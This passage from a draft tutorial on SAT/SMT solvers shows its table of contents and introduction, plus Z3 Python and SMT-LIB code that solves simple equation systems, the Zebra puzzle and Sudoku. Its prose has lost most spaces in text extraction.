5.5.4 Homework . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
5.5.5 Furtherreading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
5.5.6 SudokuasaSATproblem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
5.6 SolvingProblemEuler31: “Coinsums” . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
5.7 UsingZ3theoremprovertoproveequivalenceofsomeweirdalternativetoXORoperation . . .15
5.7.1 InSMT-LIBform . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
5.7.2 Usinguniversalquantifier . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
5.7.3 Howtheexpressionworks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
5.8 Dietz’sformula . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
5.9 CrackingLCG4withZ3. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
5.10SolvingpipepuzzleusingZ3SMT-solver . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
5.10.1Generation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
5.10.2Solving . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
5.11CrackingMinesweeperwithZ3SMTsolver . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
5.11.1Themethod . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
5.11.2Thecode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
5.12Recalculatingmicro-spreadsheetusingZ3Py . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
5.12.1Unsatcore . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
5.12.2Stresstest . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
5.12.3Thefiles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
1Satisfiabilitymodulotheories
2Booleansatisfiabilityproblem
3AlsoKnownAs
4Linearcongruentialgenerator
1
6 Program synthesis 32
6.1 SynthesisofsimpleprogramusingZ3SMT-solver . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
6.1.1 Fewnotes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
6.1.2 Thecode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
6.2 Rockeydongle: findingunknownalgorithmusingonlyinput/outputpairs . . . . . . . . . . . . . . . 35
6.2.1 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
6.2.2 Thefiles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
6.2.3 Furtherwork . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
7 Toy decompiler 40
7.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
7.2 Datastructure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
7.3 Simpleexamples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
7.4 Dealingwithcompileroptimizations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
7.4.1 Divisionusingmultiplication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
7.5 Obfuscation/deobfuscation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52
7.6 Tests. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
7.6.1 Evaluatingexpressions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
7.6.2 UsingZ3SMT-solverfortesting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
7.7 Myotherimplementationsoftoydecompiler . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59
7.7.1 Evensimplertoydecompiler . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59
7.8 Differencebetweentoydecompilerandcommercial-gradeone . . . . . . . . . . . . . . . . . . . . 60
7.9 Furtherreading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60
7.10Thefiles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
8 Symbolic execution 61
8.1 Symboliccomputation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
8.1.1 Rationaldatatype . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
8.2 Symbolicexecution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
8.2.1 SwappingtwovaluesusingXOR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
8.2.2 Changeendianness . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63
8.2.3 FastFouriertransform . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65
8.2.4 Cyclicredundancycheck . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67
8.2.5 Linearcongruentialgenerator . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70
8.2.6 Pathconstraint . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71
8.2.7 Divisionbyzero . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
8.2.8 Mergesort . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
8.2.9 ExtendingExprclass . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75
8.2.10Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75
8.3 Furtherreading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75
9 KLEE 76
9.1 Installation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76
9.2 School-levelequation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76
9.3 Zebrapuzzle . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77
9.4 Sudoku . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
9.5 Unittest: HTML/CSScolor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85
9.6 Unittest: strcmp()function . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
9.7 UNIXdate/time . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89
9.8 Inversefunctionforbase64decoder . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 93
9.9 CRC(Cyclicredundancycheck) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 96
9.9.1 Bufferalterationcase#1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 96
9.9.2 Bufferalterationcase#2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97
9.9.3 RecoveringinputdataforgivenCRC32valueofit . . . . . . . . . . . . . . . . . . . . . . . . . 98
9.9.4 Incomparisonwithotherhashingalgorithms . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99
9.10LZSSdecompressor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99
9.11strtodx()fromRetroBSD . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102
9.12Unittesting: simpleexpressionevaluator(calculator) . . . . . . . . . . . . . . . . . . . . . . . . . . 105
9.13Regularexpressions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 110
9.14Exercise . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 111
2
10(Amateur) cryptography 111
10.1Seriouscryptography . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 111
10.1.1Attemptstobreak“serious”crypto . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 114
10.2Amateurcryptography . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 114
10.2.1Bugs. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 116
10.2.2XORciphers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 116
10.2.3Otherfeatures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 116
10.2.4Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 116
10.3Casestudy: simplehashfunction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117
10.3.1Manualdecompiling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117
10.3.2Nowlet’susetheZ3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 120
11SAT-solvers 123
11.1CNFform . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 123
11.2Example: 2-bitadder . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 124
11.2.1MiniSat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126
11.2.2CryptoMiniSat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127
11.3CrackingMinesweeperwithSATsolver . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
11.3.1Simple populationcount function. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
11.3.2Minesweeper . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
11.4Conway’s“GameofLife” . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 134
11.4.1Reversingbackstateof“GameofLife” . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 134
11.4.2Finding“stilllives” . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 140
11.4.3Thesourcecode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148
12Acronyms used 148
1 This is a draft!
Thisisveryearlydraft,butstillcanbeinterestingforsomeone.
Latestversionisalwaysavailableat http://yurichev.com/writings/SAT_SMT_draft-EN.pdf . Russin
versionisat http://yurichev.com/writings/SAT_SMT_draft-RU.pdf .
Currenttextversion: May8,2017.
Fornewsaboutupdates,youmaysubscribemytwitter5,facebook6,orgithubrepo7.
2 Thanks
LeonardodeMouraandNikolajBjorner,forhelp.
3 Introduction
SAT/SMTsolverscanbeviewedassolversofhugesystemsofequations. Thedifferenceisthat SMTsolvers
takessystemsinarbitraryformat,while SATsolversarelimitedtobooleanequationsin CNF8form.
Alotofrealworldproblemscanberepresentedasproblemsofsolvingsystemofequations.
4 Is it a hype? Yet another fad?
Somepeoplesay,thisisjustanotherhype. No, SATisoldenoughandfundamentalto CS9. Thereasonof
increasedinteresttoitisthatcomputersgetsfasteroverthelastcoupledecades,sothereareattemptsto
solveoldproblemsusing SAT/SMT,whichwereinaccessibleinpast.
5https://twitter.com/yurichev
6https://www.facebook.com/dennis.yurichev.5
7https://github.com/dennis714/SAT_SMT_article
8Conjunctivenormalform
9Computerscience
3
5SMT-solvers
5.1 School-level system of equations
I’vegotthisschool-levelsystemofequationscopypastedfromWikipedia10:
3x+ 2y z= 1
2x 2y+ 4z= 2
 x+1
2y z= 0
WillitbepossibletosolveitusingZ3? Hereitis:
#!/usr/bin/python
from z3 import *
x = Real('x')
y = Real('y')
z = Real('z')
s = Solver()
s.add(3*x + 2*y - z == 1)
s.add(2*x - 2*y + 4*z == -2)
s.add(-x + 0.5*y - z == 0)
print s.check()
print s.model()
Weseethisafterrun:
sat
[z = -2, y = -2, x = 1]
Ifwechangeanyequationinsomewaysoitwillhavenosolution,s.check()willreturn“unsat”.
I’veused“Real” sort(somekindofdatatypein SMT-solvers)becausethelastexpressionequalsto1
2,
whichis,ofcourse,arealnumber. Fortheintegersystemofequations,“Int” sortwouldworkfine.
Python(andotherhigh-level PL11slikeC#)interfaceishighlypopular,becauseit’spractical,butinfact,
thereisastandardlanguagefor SMT-solverscalledSMT-LIB12.
Ourexamplerewrittentoitlookslikethis:
(declare-const x Real)
(declare-const y Real)
(declare-const z Real)
(assert (=(-(+(* 3 x) (* 2 y)) z) 1))
(assert (=(+(-(* 2 x) (* 2 y)) (* 4 z)) -2))
(assert (=(-(+ (- 0 x) (* 0.5 y)) z) 0))
(check-sat)
(get-model)
ThislanguageisveryclosetoLISP,butissomewhathardtoreadforuntrainedeyes.
Nowwerunit:
% z3 -smt2 example.smt
sat
(model
(define-fun z () Real
(- 2.0))
(define-fun y () Real
(- 2.0))
(define-fun x () Real
1.0)
)
SowhenyoulookbacktomyPythoncode,youmayfeelthatthese3expressionscouldbeexecuted.This
isnottrue: Z3PyAPIoffersoverloadedoperators,soexpressionsareconstructedandpassedintotheguts
ofZ3withoutanyexecution13. Iwouldcallit“embedded DSL14”.
10https://en.wikipedia.org/wiki/System_of_linear_equations
11ProgrammingLanguage
12http://smtlib.cs.uiowa.edu/papers/smt-lib-reference-v2.5-r2015-06-28.pdf
13https://github.com/Z3Prover/z3/blob/6e852762baf568af2aad1e35019fdf41189e4e12/src/api/python/z3.py
14Domain-specificlanguage
4
SamethingforZ3C++API,youmayfindthere“operator+”declarationsandmanymore15.
Z3API16sforJava,MLand.NETarealsoexist17.
Z3Pytutorial: https://github.com/ericpony/z3py-tutorial .
Z3tutorialwhichusesSMT-LIBlanguage: http://rise4fun.com/Z3/tutorial/guide .
5.2 Another school-level system of equations
I’vefoundthissomewhereatFacebook:
Figure1:Systemofequations
It’sthateasytosolveitinZ3:
#!/usr/bin/python
from z3 import *
circle, square, triangle = Ints('circle square triangle')
s = Solver()
s.add(circle+circle==10)
s.add(circle*square+square==12)
s.add(circle*square-triangle*circle==circle)
print s.check()
print s.model()
sat
[triangle = 1, square = 2, circle = 5]
5.3 Connection between SATandSMT solvers
EarlySMT-solverswerefrontendsto SATsolvers,i.e.,theytranslatinginputSMTexpressionsinto CNFand
feedSAT-solverwithit. Translationprocessissometimescalled“bitblasting”. Some SMT-solversstillworks
inthatway: STPusesMiniSATorCryptoMiniSATasbackendSAT-solver. Someother SMT-solversaremore
advanced(likeZ3),sotheyusesomethingevenmorecomplex.
5.4 Zebra puzzle ( AKA Einstein puzzle)
Zebrapuzzleisapopularpuzzle,definedasfollows:
15https://github.com/Z3Prover/z3/blob/6e852762baf568af2aad1e35019fdf41189e4e12/src/api/c%2B%2B/z3%2B%2B.h
16Applicationprogramminginterface
17https://github.com/Z3Prover/z3/tree/6e852762baf568af2aad1e35019fdf41189e4e12/src/api
5
1.Therearefivehouses.
2.TheEnglishmanlivesintheredhouse.
3.TheSpaniardownsthedog.
4.Coffeeisdrunkinthegreenhouse.
5.TheUkrainiandrinkstea.
6.Thegreenhouseisimmediatelytotherightoftheivoryhouse.
7.TheOldGoldsmokerownssnails.
8.Koolsaresmokedintheyellowhouse.
9.Milkisdrunkinthemiddlehouse.
10.TheNorwegianlivesinthefirsthouse.
11.ThemanwhosmokesChesterfieldslivesinthehousenexttothemanwiththefox.
12.Koolsaresmokedinthehousenexttothehousewherethehorseiskept.
13.TheLuckyStrikesmokerdrinksorangejuice.
14.TheJapanesesmokesParliaments.
15.TheNorwegianlivesnexttothebluehouse.
Now,whodrinkswater? Whoownsthezebra?
In the interest of clarity, it must be added that each of the five houses is painted a dif-
ferent color, and their inhabitants are of different national extractions, own different pets,
drink different beverages and smoke different brands of American cigarets [sic]. One other
thing: instatement6,rightmeansyourright.
(https://en.wikipedia.org/wiki/Zebra_Puzzle )
It’saverygoodexampleof CSP18.
Wewouldencodeeachentityasintegervariable,representingnumberofhouse.
Then, to define that Englishman lives in red house, we will add this constraint: Englishman == Red ,
meaningthatnumberofahousewhereEnglishmenresidesandwhichispaintedinredisthesame.
TodefinethatNorwegianlivesnexttothebluehouse,wedon’trealyknow,ifitisatleftsideofbluehouse
oratrightside,butweknowthathousenumbersaredifferentbyjust1. Sowewilldefinethisconstraint:
Norwegian==Blue-1 OR Norwegian==Blue+1 .
Wewillalsoneedtolimitallhousenumbers,sotheywillbeinrangeof1..5.
Wewillalsouse Distincttoshowthatallvariousentitiesofthesametypeareallhasdifferenthouse
numbers.
#!/usr/bin/env python
from z3 import *
Yellow, Blue, Red, Ivory, Green=Ints('Yellow Blue Red Ivory Green')
Norwegian, Ukrainian, Englishman, Spaniard, Japanese=Ints('Norwegian Ukrainian Englishman Spaniard Japanese')
Water, Tea, Milk, OrangeJuice, Coffee=Ints('Water Tea Milk OrangeJuice Coffee')
Kools, Chesterfield, OldGold, LuckyStrike, Parliament=Ints('Kools Chesterfield OldGold LuckyStrike Parliament')
Fox, Horse, Snails, Dog, Zebra=Ints('Fox Horse Snails Dog Zebra')
s = Solver()
# colors are distinct for all 5 houses:
s.add(Distinct(Yellow, Blue, Red, Ivory, Green))
# all nationalities are living in different houses:
s.add(Distinct(Norwegian, Ukrainian, Englishman, Spaniard, Japanese))
# so are beverages:
s.add(Distinct(Water, Tea, Milk, OrangeJuice, Coffee))
# so are cigarettes:
s.add(Distinct(Kools, Chesterfield, OldGold, LuckyStrike, Parliament))
# so are pets:
s.add(Distinct(Fox, Horse, Snails, Dog, Zebra))
18Constraintsatisfactionproblem
6
# limits.
# adding two constraints at once (separated by comma) is the same
# as adding one And() constraint with two subconstraints
s.add(Yellow>=1, Yellow<=5)
s.add(Blue>=1, Blue<=5)
s.add(Red>=1, Red<=5)
s.add(Ivory>=1, Ivory<=5)
s.add(Green>=1, Green<=5)
s.add(Norwegian>=1, Norwegian<=5)
s.add(Ukrainian>=1, Ukrainian<=5)
s.add(Englishman>=1, Englishman<=5)
s.add(Spaniard>=1, Spaniard<=5)
s.add(Japanese>=1, Japanese<=5)
s.add(Water>=1, Water<=5)
s.add(Tea>=1, Tea<=5)
s.add(Milk>=1, Milk<=5)
s.add(OrangeJuice>=1, OrangeJuice<=5)
s.add(Coffee>=1, Coffee<=5)
s.add(Kools>=1, Kools<=5)
s.add(Chesterfield>=1, Chesterfield<=5)
s.add(OldGold>=1, OldGold<=5)
s.add(LuckyStrike>=1, LuckyStrike<=5)
s.add(Parliament>=1, Parliament<=5)
s.add(Fox>=1, Fox<=5)
s.add(Horse>=1, Horse<=5)
s.add(Snails>=1, Snails<=5)
s.add(Dog>=1, Dog<=5)
s.add(Zebra>=1, Zebra<=5)
# main constraints of the puzzle:
# 2.The Englishman lives in the red house.
s.add(Englishman==Red)
# 3.The Spaniard owns the dog.
s.add(Spaniard==Dog)
# 4.Coffee is drunk in the green house.
s.add(Coffee==Green)
# 5.The Ukrainian drinks tea.
s.add(Ukrainian==Tea)
# 6.The green house is immediately to the right of the ivory house.
s.add(Green==Ivory+1)
# 7.The Old Gold smoker owns snails.
s.add(OldGold==Snails)
# 8.Kools are smoked in the yellow house.
s.add(Kools==Yellow)
# 9.Milk is drunk in the middle house.
s.add(Milk==3) # i.e., 3rd house
# 10.The Norwegian lives in the first house.
s.add(Norwegian==1)
# 11.The man who smokes Chesterfields lives in the house next to the man with the fox.
s.add(Or(Chesterfield==Fox+1, Chesterfield==Fox-1)) # left or right
# 12.Kools are smoked in the house next to the house where the horse is kept.
s.add(Or(Kools==Horse+1, Kools==Horse-1)) # left or right
# 13.The Lucky Strike smoker drinks orange juice.
s.add(LuckyStrike==OrangeJuice)
# 14.The Japanese smokes Parliaments.
s.add(Japanese==Parliament)
# 15.The Norwegian lives next to the blue house.
7
s.add(Or(Norwegian==Blue+1, Norwegian==Blue-1)) # left or right
r=s.check()
print r
if r==unsat:
exit(0)
m=s.model()
print(m)
Whenwerunit,wegotcorrectresult:
sat
[Snails = 3,
Blue = 2,
Ivory = 4,
OrangeJuice = 4,
Parliament = 5,
Yellow = 1,
Fox = 1,
Zebra = 5,
Horse = 2,
Dog = 4,
Tea = 2,
Water = 1,
Chesterfield = 2,
Red = 3,
Japanese = 5,
LuckyStrike = 4,
Norwegian = 1,
Milk = 3,
Kools = 1,
OldGold = 3,
Ukrainian = 2,
Coffee = 5,
Green = 5,
Spaniard = 4,
Englishman = 3]
5.5 Sudoku puzzle
Sudokupuzzleisa9*9gridwithsomecellsfilledwithvalues,someareempty:
53
8 2
715
4 53
17 6
32 8
65 9
4 3
97
UnsolvedSudoku
Numbersofeachrowmustbeunique,i.e.,itmustcontainall9numbersinrangeof1..9withoutrepetition.
Samestoryforeachcolumnandalsoforeach3*3square.
Thispuzzleisgoodcandidatetotry SMTsolveron,becauseit’sessentiallyanunsolvedsystemofequa-
tions.
8
5.5.1 The first idea
Theonlythingwemustdecideisthathowtodetermineinoneexpression,iftheinput9variableshasall9
uniquenumbers? Theyarenotorderedorsorted,afterall.
Fromtheschool-levelarithmetics,wecandevisethisidea:
10i1+ 10i2+  + 10i9
| {z }
9= 1111111110 (1)
Takeeachinputvariable,calculate 10iandsumthemall.Ifallinputvaluesareunique,eachwillbesettled
atitsownplace. Evenmorethanthat: therewillbenoholes,i.e.,noskippedvalues. So,incaseofSudoku,
1111111110numberwillbefinalresult,indicatingthatall9inputvaluesareunique,inrangeof1..9.
Exponentiationisheavyoperation,canweusebinaryoperations? Yes,justreplace10with2:
2i1+ 2i2+  + 2i9
| {z }
9= 1111111110 2 (2)
Theeffectisjustthesame,butthefinalvalueisinbase2insteadof10.
Nowaworkingexample:
import sys
from z3 import *
"""
coordinates:
------------------------------
00 01 02 | 03 04 05 | 06 07 08
10 11 12 | 13 14 15 | 16 17 18
20 21 22 | 23 24 25 | 26 27 28
------------------------------
30 31 32 | 33 34 35 | 36 37 38
40 41 42 | 43 44 45 | 46 47 48
50 51 52 | 53 54 55 | 56 57 58
------------------------------
60 61 62 | 63 64 65 | 66 67 68
70 71 72 | 73 74 75 | 76 77 78
80 81 82 | 83 84 85 | 86 87 88
------------------------------
"""
s=Solver()
# using Python list comprehension, construct array of arrays of BitVec instances:
cells=[[BitVec('cell%d%d' % (r, c), 16) for c in range(9)] for r in range(9)]
# http://www.norvig.com/sudoku.html
# http://www.mirror.co.uk/news/weird-news/worlds-hardest-sudoku-can-you-242294
puzzle="..53.....8......2..7..1.5..4....53...1..7...6..32...8..6.5....9..4....3......97.."
# process text line:
current_column=0
current_row=0
for i in puzzle:
if i!='.':
s.add(cells[current_row][current_column]==BitVecVal(int(i),16))
current_column=current_column+1
if current_column==9:
current_column=0
current_row=current_row+1
one=BitVecVal(1,16)
mask=BitVecVal(0b1111111110,16)
# for all 9 rows
for r in range(9):
s.add(((one<<cells[r][0]) +
(one<<cells[r][1]) +
(one<<cells[r][2]) +
(one<<cells[r][3]) +
(one<<cells[r][4]) +
(one<<cells[r][5]) +
(one<<cells[r][6]) +
(one<<cells[r][7]) +
9
(one<<cells[r][8]))==mask)
# for all 9 columns
for c in range(9):
s.add(((one<<cells[0][c]) +
(one<<cells[1][c]) +
(one<<cells[2][c]) +
(one<<cells[3][c]) +
(one<<cells[4][c]) +
(one<<cells[5][c]) +
(one<<cells[6][c]) +
(one<<cells[7][c]) +
(one<<cells[8][c]))==mask)
# enumerate all 9 squares
for r in range(0, 9, 3):
for c in range(0, 9, 3):
# add constraints for each 3*3 square:
s.add((one<<cells[r+0][c+0]) +
(one<<cells[r+0][c+1]) +
(one<<cells[r+0][c+2]) +
(one<<cells[r+1][c+0]) +
(one<<cells[r+1][c+1]) +
(one<<cells[r+1][c+2]) +
(one<<cells[r+2][c+0]) +
(one<<cells[r+2][c+1]) +
(one<<cells[r+2][c+2])==mask)
#print s.check()
s.check()
#print s.model()
m=s.model()
for r in range(9):
for c in range(9):
sys.stdout.write (str(m[cells[r][c]])+" ")
print ""
(https://github.com/dennis714/SAT_SMT_article/blob/master/SMT/sudoku_plus.py )
% time python sudoku_plus.py
1 4 5 3 2 7 6 9 8
8 3 9 6 5 4 1 2 7
6 7 2 9 1 8 5 4 3
4 9 6 1 8 5 3 7 2
2 1 8 4 7 3 9 5 6
7 5 3 2 9 6 4 8 1
3 6 7 5 4 2 8 1 9
9 8 4 7 6 1 2 3 5
5 2 1 8 3 9 7 6 4
real 0m11.717s
user 0m10.896s
sys 0m0.068s
Evenmore,wecanreplacesummingoperationtologicalOR:
2i1_2i2_    _ 2i9| {z }
9= 1111111110 2 (3)
import sys
from z3 import *
"""
coordinates:
------------------------------
00 01 02 | 03 04 05 | 06 07 08
10 11 12 | 13 14 15 | 16 17 18
20 21 22 | 23 24 25 | 26 27 28
------------------------------
30 31 32 | 33 34 35 | 36 37 38
40 41 42 | 43 44 45 | 46 47 48
50 51 52 | 53 54 55 | 56 57 58
------------------------------
60 61 62 | 63 64 65 | 66 67 68
10
70 71 72 | 73 74 75 | 76 77 78
80 81 82 | 83 84 85 | 86 87 88
------------------------------
"""
s=Solver()
# using Python list comprehension, construct array of arrays of BitVec instances:
cells=[[BitVec('cell%d%d' % (r, c), 16) for c in range(9)] for r in range(9)]
# http://www.norvig.com/sudoku.html
# http://www.mirror.co.uk/news/weird-news/worlds-hardest-sudoku-can-you-242294
puzzle="..53.....8......2..7..1.5..4....53...1..7...6..32...8..6.5....9..4....3......97.."
# process text line:
current_column=0
current_row=0
for i in puzzle:
if i!='.':
s.add(cells[current_row][current_column]==BitVecVal(int(i),16))
current_column=current_column+1
if current_column==9:
current_column=0
current_row=current_row+1
one=BitVecVal(1,16)
mask=BitVecVal(0b1111111110,16)
# for all 9 rows
for r in range(9):
s.add(((one<<cells[r][0]) |
(one<<cells[r][1]) |
(one<<cells[r][2]) |
(one<<cells[r][3]) |
(one<<cells[r][4]) |
(one<<cells[r][5]) |
(one<<cells[r][6]) |
(one<<cells[r][7]) |
(one<<cells[r][8]))==mask)
# for all 9 columns
for c in range(9):
s.add(((one<<cells[0][c]) |
(one<<cells[1][c]) |
(one<<cells[2][c]) |
(one<<cells[3][c]) |
(one<<cells[4][c]) |
(one<<cells[5][c]) |
(one<<cells[6][c]) |
(one<<cells[7][c]) |
(one<<cells[8][c]))==mask)
# enumerate all 9 squares
for r in range(0, 9, 3):
for c in range(0, 9, 3):
# add constraints for each 3*3 square:
s.add(one<<cells[r+0][c+0] |
one<<cells[r+0][c+1] |
one<<cells[r+0][c+2] |
one<<cells[r+1][c+0] |
one<<cells[r+1][c+1] |
one<<cells[r+1][c+2] |
one<<cells[r+2][c+0] |
one<<cells[r+2][c+1] |
one<<cells[r+2][c+2]==mask)
#print s.check()
s.check()
#print s.model()
m=s.model()
for r in range(9):
for c in range(9):
sys.stdout.write (str(m[cells[r][c]])+" ")
print ""
11
(https://github.com/dennis714/SAT_SMT_article/blob/master/SMT/sudoku_or.py )
Nowitworksmuchfaster. Z3handlesORoperationoverbitvectorsbetterthanaddition?
% time python sudoku_or.py
1 4 5 3 2 7 6 9 8
8 3 9 6 5 4 1 2 7
6 7 2 9 1 8 5 4 3
4 9 6 1 8 5 3 7 2
2 1 8 4 7 3 9 5 6
7 5 3 2 9 6 4 8 1
3 6 7 5 4 2 8 1 9
9 8 4 7 6 1 2 3 5
5 2 1 8 3 9 7 6 4
real 0m1.429s
user 0m1.393s
sys 0m0.036s
ThepuzzleIusedasexampleisdubbedasoneofthehardestknown19(well,forhumans). Ittook 1:4
secondsonmyIntelCorei3-3110M2.4GHznotebooktosolveit.
5.5.2 The second idea
Myfirstapproachisfarfromeffective,Ididwhatfirstcametomymindandworked. Anotherapproachisto
use distinctcommandfromSMTLIB,whichtellsZ3thatsomevariablesmustbedistinct(orunique). This
commandisalsoavailableinZ3Pythoninterface.
I’verewrittenmyfirstSudokusolver,nowitoperatesover Intsort,ithas distinctcommandsinsteadof
bitoperations,andnowalsootherconstaintadded:eachcellvaluemustbein1..9range,because,otherwise,
Z3willoffer(althoughcorrect)solutionwithtoobigand/ornegativenumbers.
import sys
from z3 import *
"""
------------------------------
00 01 02 | 03 04 05 | 06 07 08
10 11 12 | 13 14 15 | 16 17 18
20 21 22 | 23 24 25 | 26 27 28
------------------------------
30 31 32 | 33 34 35 | 36 37 38
40 41 42 | 43 44 45 | 46 47 48
50 51 52 | 53 54 55 | 56 57 58
------------------------------
60 61 62 | 63 64 65 | 66 67 68
70 71 72 | 73 74 75 | 76 77 78
80 81 82 | 83 84 85 | 86 87 88
------------------------------
"""
s=Solver()
